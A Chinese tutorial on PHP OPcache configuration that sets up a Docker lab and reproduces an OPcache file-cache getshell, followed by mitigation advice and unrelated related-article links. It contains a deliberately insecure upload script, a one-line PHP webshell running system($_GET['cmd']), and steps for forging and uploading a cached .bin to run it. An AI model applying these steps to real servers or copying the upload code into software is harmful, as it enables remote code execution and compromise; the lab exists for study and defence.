OPcache基础

OPcache是一种通过解析的PHP脚本预编译的字节码存放在共享内存中来避免每次加载和解析PHP脚本的开销,解析器可以直接从共享内存读取已经缓存的字节码,从而大大提高了PHP的执行效率。
先看下PHP的正常执行流程
1.request请求(nginx,apache,cli等)
2.Zend引擎读取.php文件
3.扫描其字典和表达式
4.解析文件
5.创建要执行的计算机代码(成为Opcode)
6.最后执行Opcode
7.response返回
每一次执行PHP都要执行一遍上面的步骤,如果PHP源码没有变化,那么Opcode也不会变化,显然没必要 我们看看使用Opcache之后
避免重组编译 减少CPU和内存开销

OPcache配置解读

//开启opcache

opcache.enable=1

//CLI环境下,PHP启用OPcache

opcache.enable_cli=1

//OPcache共享内存存储大小,单位MB

opcache.memory_consumption=128  

//PHP使用了一种叫做字符串驻留(string interning)的技术来改善性能。例如,如果你在代码中使用了1000次字符串“foobar”,在PHP内部只会在第一使用这个字符串的时候分配一个不可变的内存区域来存储这个字符串,其他的999次使用都会直接指向这个内存区域。这个选项则会把这个特性提升一个层次——默认情况下这个不可变的内存区域只会存在于单个php-fpm的进程中,如果设置了这个选项,那么它将会在所有的php-fpm进程中共享。在比较大的应用中,这可以非常有效地节约内存,提高应用的性能。

这个选项的值是以兆字节(megabytes)作为单位,如果把它设置为16,则表示16MB,默认是4MB

opcache.interned_strings_buffer=8

//这个选项用于控制内存中最多可以缓存多少个PHP文件。这个选项必须得设置得足够大,大于你的项目中的所有PHP文件的总和。

设置值取值范围最小值是 200,最大值在 PHP 5.5.6 之前是 100000,PHP 5.5.6 及之后是 1000000。也就是说在200到1000000之间。

opcache.max_accelerated_files=4000

//设置缓存的过期时间(单位是秒),为0的话每次都要检查

opcache.revalidate_freq=60

//从字面上理解就是“允许更快速关闭”。它的作用是在单个请求结束时提供一种更快速的机制来调用代码中的析构器,
从而加快PHP的响应速度和PHP进程资源的回收速度,这样应用程序可以更快速地响应下一个请求。把它设置为1就可以使用这个机制了。

opcache.fast_shutdown=1

//如果启用(设置为1),OPcache会在opcache.revalidate_freq设置的秒数去检测文件的时间戳(timestamp)检查脚本是否更新。
如果这个选项被禁用(设置为0),opcache.revalidate_freq会被忽略,PHP文件永远不会被检查。这意味着如果你修改了你的代码,然后你把它更新到服务器上,再在浏览器上请求更新的代码对应的功能,你会看不到更新的效果

强烈建议你在生产环境中设置为0,更新代码后,再平滑重启PHP和web服务器。

opcache.validate_timestamps=0

//开启Opcache File Cache(实验性), 通过开启这个, 我们可以让Opcache把opcode缓存缓存到外部文件中, 对于一些脚本, 会有很明显的性能提升.

这样PHP就会在/tmp目录下Cache一些Opcode的二进制导出文件, 可以跨PHP生命周期存在.

opcache.file_cache=/tmp

Docker漏洞环境搭建

1.创建容器

创建php7.0的容器 将当前主机的web目录映射到容器中

docker run -d -p 8888:80 --name php80  -v /var/www:/var/www/html --privileged=true --restart=always php:7.0

2.找不到php.ini文件怎么办?

通过这个方法搭建的时候发现php.ini找不到 这一点可以通过phpinfo函数找到 这个

进入linux的/usr/local/etc/php  将目录下的 php.ini-development 文件复制一份到当前文件夹下名为php.ini 重启服务即可完美解决

3.修改配置文件

在php.ini中 找到如下配置;opcache.enable=0
//修改成(去掉;注释,将0改成1)

opcache.enable=1

关闭时间戳验证

;opcache.validate_timestamps=1

//修改成(去掉;注释,将1改成0)

opcache.validate_timestamps=0

设置Opcache缓存路径

;opcache.file_cache=

//修改

opcache.file_cache="/tmp/opcache"

设置缓存优先级

;opcache.file_cache_only=0

//修改

opcache.file_cache_only=1


在最后一行添加

用来引用opcache

zend_extension=opcache.so

重启服务器生效

4.添加漏洞页面

在宿主机的web目录创建即可

index.php

<html>

    <body>

        <form action="upload-file.php" method="post" enctype="multipart/form-data">

            <label for="file">filename:</label>

            <input type="file" name="file" id="file" />

            <br/>

            <label for="filepath">filepath:</label>

            <input type="text" name="filepath" id="filepath" />

            <br/>

            <input type="submit" name="submit" value="submit" />

        </form>

    </body>

</html>

upload-file.php

<?php

    $path = $_POST['filepath'];

    echo "filename: " . $_FILES["file"]["name"] . "<br />";

    echo "type: " . $_FILES["file"]["type"] . "<br />";

    echo "size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";

    move_uploaded_file($_FILES["file"]["tmp_name"],  $path . $_FILES["file"]["name"]);

    echo "save : " . $path . $_FILES["file"]["name"];

?>

phpinfo.php

<?php

    phpinfo();

?>

Opcache漏洞复现

假设目标站点已经又一个phpinfo()文件了,通过这个文件可以得到Opcache缓存目录,还需要下一步计算system_id
system_id是当前PHP版本号,Zend扩展版本号以及各个数据类型大小的MD5哈希值
脚本地址:https://github.com/GoSecure/php7-opcache-override
此时可以利用上传漏洞将文件上传到web目录,但是目录没有读写的权限,这时候就可以通过/tmp/opcache/[system_id]/var/www/index.php.bin为一个webshell的二进制缓存运行webshell
 
本地构建webshell文件index.php
<?php

   system($_GET['cmd']);

?>
1.在本地php.ini中设置opcache.file_cache为你所想要指定的缓存目录

2.运行php服务器向index发送请求,触发缓存疫情进行文件缓存

3.打开缓存目录中的index.php.bin文件修改里面的的system_id为目标站点的system_id  记事本打开就ok改成我们用脚本计算出来的system_id值

4.通过上传漏洞将修改后的index.php.bin上传到tmp/opcache/[system_id]/var/www/index.php.bin覆盖掉原来的index.php.bin
重新访问index.php,就成功运行了webshell

漏洞修补:

   禁用file_cache_only
   启用validate_timestamp

参考引用+其他延伸

CTF题
https://ctf.rip/asis-ctf-2016-binarycloud-web-challenge/
https://github.com/tothi/ctfs/tree/master/alictf-2016/homework
php安装后找不到php.ini
利用PHP的OPcache机制getshell/
https://chybeta.github.io/2017/05/13/利用PHP的OPcache机制
http://www.vuln.cn/6763

php7的Opcache getshell的更多相关文章

  1. PHP7添加opcache.so模块

    启动php报错如下: # /usr/local/php7/sbin/php-fpm [-Apr- ::] NOTICE: PHP message: PHP Warning: PHP Startup: ...

  2. PHP7有没有你们说的那么牛逼

    男人不能快,但程序一定要快.PHP7到底快不快,我们拭目以待. PHP7来一发 PHP7正式发布到现在已经一年半了,刚出道就号称比旧版本快了几倍,各种开源框架或系统运行在PHP7上速度效率提高了几倍, ...

  3. PHP 调用 Go 服务的正确方式 - Unix Domain Sockets

    * { color: #3e3e3e } body { font-family: "Helvetica Neue", Helvetica, "Hiragino Sans ...

  4. 记一次PHP7+opcache+zmq出现SIGSEGV 问题的查找(一次不成功的bug查找)

    Title:  记一次PHP7+opcache+zmq出现SEGSEGV问题的查找(一次不成功的bug查找) bug来历自述:线上代码PHP环境是5.2,为了提升性能(逼格),于是升级为PHP7并使用 ...

  5. PHP7 开启Zend Opcache

    PHP7 开启Zend Opcache 作为PHP这10年来最大的版本与性能升级,PHP7在多次的测试中都表现出很夸张的性能提升,然而,为了让它能发挥出最大的性能,需要手动开启PHP自带的opcach ...

  6. 实现opcache加速php7.X

    一.环境准备 操作系统:Centos8.3.2011 软件:PHP7.2.24 二.安装过程 1.安装软件 [20:03:29 root@centos8 src]#dnf -y install php ...

  7. CentOS 7.1编译安装PHP7

    原文: https://typecodes.com/web/centos7compilephp7.html?utm_source=tuicool&utm_medium=referral 1 创 ...

  8. CentOS6编译安装PHP7+Nginx

    本文属于动手搭建PHP开发环境的一部分,更多点击链接查看. 本文以centos6为例. 安装PHP 下载 http://cn2.php.net/distributions/php-5.6.22.tar ...

  9. PHP从PHP5.0到PHP7.1的性能全评测

    本文是最初是来自国外的这篇:PHP Performance Evolution 2016, 感谢高可用架构公众号翻译成了中文版, 此处是转载的高可用架构翻译后的文章从PHP 5到PHP 7性能全评测( ...

随机推荐

  1. js 如何获取浏览器的高度?

    <SCRIPT LANGUAGE="JavaScript"><!--var s = ""; s += " 网页可见区域宽:" ...

  2. git学习(六) git reset操作

    git reset 操作 git reset git reset HEAD 文件名 移除不必要的添加到暂存区的文件 git reset HEAD^ 或者 commitid 去掉上一次的提交 git r ...

  3. tp5伪静态--宝塔

    location / { if (!-e $request_filename) { rewrite ^(.*)$ /index.php?s=$1 last; break; } }

  4. Hexo相关配置

    date: 2018-11-16 18:27:14 updated: 2018-11-16 20:06:16 1.配置Hexo基本信息 title: 猫熊小才天の书院 #博客标题 subtitle: ...

  5. 如何用vue实现一个矩形标记区域 rectangle marker

    代码地址:vue-rectangle-marker 一.前言 一些cms系统经常会用到区域标记功能,所以写了个用vue实现的矩形标记区域,包含拖拽.放大缩小.重置功能. 二.实现结果 初始 标记 三. ...

  6. Java学习的第十三天

    1.object类及其方法 Java类的浅层克隆,深层克隆 2.克隆很难 3.明天学习java的继承,关键字

  7. 被巴菲特看中的Snowflake,是怎样深刻改变云计算产业的?

    众所周知,在很长一段时间里,巴菲特都从来不碰科技股.但人总是会变的,他在2016年开始首次持仓苹果,并在此后一再增持,目前苹果为伯克希尔第一大重仓股. 前不久,巴菲特持股了人生中的又一家科技公司--S ...

  8. 做Java开发7年,今年9个月时间圆梦饿了么P7

    前言 工作拧螺丝,面试造火箭.我想这是每个程序员比较头疼的事情吧!但是,又必须要经历一个面试流程,尤其是摸不清面试官问的问题,导致面试的时候不知道如何回答.本文是工作7年Java程序员从几十次面试中挑 ...

  9. 重磅解读:K8s Cluster Autoscaler模块及对应华为云插件Deep Dive

    摘要:本文将解密K8s Cluster Autoscaler模块的架构和代码的Deep Dive,及K8s Cluster Autoscaler 华为云插件. 背景信息 基于业务团队(Cloud BU ...

  10. 细学C++之C++语言的特点

    优点: 1.强大的抽象封装能力:这让C++语言具备了强大的开发工程能力 2.高性能:运行快,并且占用资源少 3.低功耗:适合在各种微型的嵌入式设备中运行高效的程序 缺点: 1.语法相对复杂,细节比较多 ...

热门专题

java linux 读不到yml文件中的配置 @Value
mongodb和mysql性能对比
文本文件很多esc控制符
server2019远程桌面配置
微软官网WIN7下载
springboot application 找不到idea
wordpress 编辑器添加自定义相册按钮
jmeter如何测试http2
nmap -T4 -A -v 啥意思
django 日期 筛选 filter gt lt
electron打开控制台
string replace方法
logback maxFileSize不生效 1.2.11
win10ftp设置好以后手机能连上,其他电脑不能连上
D3 vue 曲线图 图例
sql用户名与数据库用户名连接
mySearcher.ClientTimeout设置
jQuery notice插件提醒
修复libgstreamer
Android studio使用了什么技术